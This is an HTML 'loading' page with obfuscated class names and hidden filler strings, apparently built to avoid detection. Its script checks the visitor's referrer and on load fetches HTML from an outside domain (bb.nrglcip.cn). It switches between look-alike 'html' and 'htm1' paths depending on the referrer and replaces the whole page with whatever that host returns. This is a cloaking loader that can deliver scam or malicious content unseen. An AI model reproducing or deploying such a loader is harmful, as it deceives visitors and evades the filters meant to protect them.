<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .geRdxqT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .geRdxqT .NGxGFpIMXrm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .geRdxqT .content {
            line-height: 50px;
            text-align: center
        }

        .geRdxqT .img {
            width: 100%
        }

        .geRdxqT .oDh8na {
            text-align: center
        }

        .geRdxqT .oDh8na span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .geRdxqT .oDh8na span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .geRdxqT .oDh8na span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .geRdxqT .oDh8na span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .geRdxqT .oDh8na span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .geRdxqT .oDh8na span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .geRdxqT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rjnIFeGchvG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var piOBl = rjnIFeGchvG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ piOBl +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ piOBl +".html?a=share";
		}
		
        MvA6uOS=url+"#"+new Date().getTime();
        MvA6uOS && function() {
            $.get(MvA6uOS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>HR8cDmqjtQL9Kzf3qu19c5D8gPhoPhozCcFw1Z</a>
<ul style='display:none' >ZELqU9YE96P8tw0eIvJsHuYS11rbWr3LYQkNEUfuOn5PL</ul>
<span style='display:none'>W5PJCKspaeG0E0C7kSXcFij8Z5hGCMflxfwI6QREBStxAs9zrF9Ai2Gmwv2Kh7KJtJC0z3oBk7VGLIFXMtr3l1acPq4ccQkPT</span>
<div style='display:none'>lo1HORAp8kS1e3WxdE4njTBjxjrbjPWKdKLBT5PgfZNJ</div>
<img  src='' style='display:none'><div class="geRdxqT">
    <div class="NGxGFpIMXrm">
        <div class="oDh8na">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >a2W8OhJ4JuHEH3Y8CS1J77eVW87C</ul>
<span style='display:none'>i3BTq1wURlz</span>
<b style='display:none' >nekMM5Bfsrx8Ij7qKDMDgQhxSadnA6JfPkJA</b>
<span style='display:none'>i3BTq1wURlz</span>
<div style='display:none'>dnRSMjNi6RJr6d4FBoK1mLpqfYCRGcCN9U18f20Hnl6Zi7</div>
<b style='display:none' >nekMM5Bfsrx8Ij7qKDMDgQhxSadnA6JfPkJA</b>
<p  style='display:none'>pBpavzRi7knaiaSTTU0PGIsRwcoLC9PiBv3MUpwKtZwKH0zi1KacmewR9GY5</p>
<ul style='display:none' >a2W8OhJ4JuHEH3Y8CS1J77eVW87C</ul>
<div style='display:none'>dnRSMjNi6RJr6d4FBoK1mLpqfYCRGcCN9U18f20Hnl6Zi7</div>
<li style='display:none' >KjdTO1QLYmPKtv03Bpqj2e</li></body>
</html>